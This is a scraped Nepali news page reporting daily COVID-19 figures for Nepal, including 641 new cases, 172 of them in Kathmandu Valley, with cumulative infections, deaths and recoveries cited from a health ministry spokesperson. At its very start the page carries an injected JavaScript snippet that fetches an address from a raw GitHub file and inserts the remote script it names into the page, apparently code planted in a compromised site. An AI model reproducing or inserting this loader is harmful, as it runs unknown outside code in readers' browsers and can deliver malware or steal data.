;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); २४ घण्टामा काठमाडौं उपत्यकामा १७२ सहित ६४१ जनामा कोरोना संक्रमण – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • २४ घण्टामा काठमाडौं उपत्यकामा १७२ सहित ६४१ जनामा कोरोना संक्रमण
जुनेली बिशेष

२४ घण्टामा काठमाडौं उपत्यकामा १७२ सहित ६४१ जनामा कोरोना संक्रमण

साउन ३२

काठमाडौं । आइतबार देशका विभिन्न ठाउँमा ६४१ कोरोनाका संक्रमित थपिएका छन् । स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डा. जागेश्वर गौतमका अनुसार पछिल्लो २४ घण्टामा ६४१ जना संक्रमित थपिएका छन् । काठमाडौं सपत्यकामा १७२ जना संक्रमित थपिएका छन्। यो सहित नेपालमा हालसम्म संक्रमितको संख्या २६ हजार ६ सय ६० पुगेको छ ।

त्यस्तै १ सय ४ जनाको कोरोनाबाट मृत्यु भएको तथ्यांक छ। विगत २४ घण्टामा थप दुई जना मृतकमा कोरोना पुष्टि भएको हो। त्यस्तै २४ घण्टामा १३४ जना निको भइ घर फर्किएको प्रवक्ता गौतमले बताए । आइतबार निको हुनेसहित हालसम्म १७ हजार ३ सय ३५ जना कोरोनाबाट मुक्त भएका छन् । देशभर सक्रिय संक्रमितको संख्या ९ हजार २ सय २१ छ । पछिल्लो २४ घण्टामा पर्सा र मोरङमा एकएक गरी २ जनाको मृत्यु भएको छ ।file Photo

फेसबुक प्रतिक्रियाहरु